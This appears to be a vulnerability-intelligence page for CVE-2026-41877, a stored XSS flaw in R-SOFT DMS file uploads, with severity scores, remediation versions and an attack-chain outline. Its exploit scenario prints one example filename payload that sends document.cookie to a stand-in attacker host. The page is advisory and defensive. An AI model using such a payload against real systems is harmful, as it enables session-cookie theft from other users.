Skip to main content

R-SOFT DMS CVE-2026-41877

| EUVDEUVD-2026-42854 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-10 cvd@cert.pl GHSA-c9ph-5j66-3j9f
5.1
CVSS 4.0 · Vendor: cert
Share

Severity by source

Vendor (cert) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Authenticated low-privilege attacker (PR:L), passive victim must view the affected page (UI:R), stored XSS crosses into victim browser session constituting scope change (S:C), with limited confidentiality and integrity impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (cert).

CVSS VectorVendor: cert

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

1
Analysis Generated
Jul 10, 2026 - 10:45 vuln.today

DescriptionCVE.org

R-SOFT DMS is vulnerable to Stored XSS in file upload functionality. Authenticated attacker can inject arbitrary HTML and JS into the name of the file being uploaded, which will be executed when visiting file list or upload status by other users.

This issue was fixed in version v3.19-2832 and v3.17-2580.

AnalysisAI

Stored XSS in R-SOFT DMS file upload functionality allows authenticated attackers to embed arbitrary HTML and JavaScript within uploaded filenames, which subsequently execute in the browsers of any user viewing the file list or upload status pages. The vulnerability affects the document management system's filename rendering pipeline, which fails to sanitize input before output into HTML context. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate to DMS with low-privilege account
Delivery
Upload file with XSS payload in filename
Exploit
Payload stored server-side in file metadata
Execution
Victim user navigates to file list or upload status page
Persist
Unsanitized filename rendered into HTML response
Impact
JavaScript executes in victim's browser session

Vulnerability AssessmentAI

Exploitation The attacker must hold a valid, authenticated account in the R-SOFT DMS with sufficient permissions to upload files (CVSS PR:L). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 base score of 5.1 (Medium) is consistent with the real-world risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An authenticated attacker with a low-privilege DMS account uploads a file whose name contains a crafted JavaScript payload (e.g., a filename such as report<script>document.location='https://attacker.tld/?c='+document.cookie</script>.pdf). When any other DMS user subsequently visits the file list or upload status page, the unsanitized filename is rendered into the HTML response and the script executes in the victim's browser, enabling session cookie theft or other client-side attacks. …
Remediation Upgrade R-SOFT DMS to version v3.19-2832 (on the 3.19 branch) or v3.17-2580 (on the 3.17 branch), as confirmed in the CVE description. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-41877 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy